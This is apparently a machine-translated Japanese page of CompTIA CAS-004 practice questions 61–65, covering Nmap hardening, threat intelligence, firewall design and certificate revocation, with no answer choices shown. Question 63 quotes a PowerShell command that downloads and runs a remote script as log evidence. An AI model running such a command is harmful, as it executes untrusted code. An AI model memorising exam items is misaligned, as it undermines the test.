CAS-004 試験問題 61

シミュレーション
あなたは、会社の特権ネットワークからの Nmap スキャン出力を解釈する任務を負ったセキュリティ アナリストです。
同社の強化ガイドラインでは次のことが示されています。
デバイスごとに 1 つのプライマリ サーバーまたはサービスが必要です。
デフォルトのポートのみを使用する必要があります。
安全でないプロトコルは無効にする必要があります。
手順
Nmap の出力を使用して、ネットワーク上のデバイスとその役割、および閉じるべき開いているポートを特定します。
Nmap によって検出されたデバイスごとに、次の情報を含むデバイス エントリをデバイス検出リストに追加します。
デバイスのIPアドレス
デバイスのプライマリ サーバーまたはサービス (各 IP は 1 つのサービス/ポートのみに関連付けられる必要があることに注意してください) 強化ガイドラインに基づいて無効にする必要があるプロトコル (準拠するには複数のポートを閉じる必要がある場合があることに注意してください)強化ガイドライン) シミュレーションの初期状態に戻したい場合は、いつでも [すべてリセット] ボタンをクリックしてください。

CAS-004 試験問題 62

企業の SOC は、特定の脆弱性を利用したアクティブなキャンペーンに関する脅威インテリジェンスを受け取りました。
同社は、この活発なキャンペーンに対して脆弱かどうかを判断したいと考えています。
企業はこの決定を行うために次のどれを使用する必要がありますか?
  • CAS-004 試験問題 63

    セキュリティ アナリストは、外部向けメール サーバーへのログイン試行の失敗数が着実に増加していることに気づきました。ジャンプ ボックスの 1 つを調査しているときに、アナリストはログ ファイルで次のことを特定しました: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl' );誰が
    次のセキュリティ制御のうち、警告を発し、攻撃の次の段階を阻止できたのはどれですか?
  • CAS-004 試験問題 64

    セキュリティ アーキテクトは、次の提案されている企業ファイアウォール アーキテクチャと構成を検討しています。

    どちらのファイアウォールもステートフルで、レイヤー 7 のフィルタリングとルーティングを提供します。この会社には次のような要件があります。
    Web サーバーは、企業ネットワークから HTTP/S 経由ですべての更新を受信する必要があります。
    Web サーバーはインターネットとの通信を開始しないでください。
    Web サーバーは、事前に承認された企業データベース サーバーにのみ接続する必要があります。
    従業員のコンピューティング デバイスは、ポート 80 および 443 経由でのみ Web サービスに接続する必要があります。
    すべての要件を最も安全な方法で確実に満たすために、アーキテクトは次のうちどれを推奨しますか? (2つお選びください。)
  • CAS-004 試験問題 65

    セキュリティ アーキテクトは、さまざまな支社を持つ製造組織に勤務しています。アーキテクトは、トラフィックを削減し、組織の本社所在地にある CA によって発行された失効した証明書の最新コピーを支社が確実に受信できるようにする方法を探しています。また、ソリューションは CA での電力要件を最小限にする必要があります。
    最良の解決策は次のうちどれですか?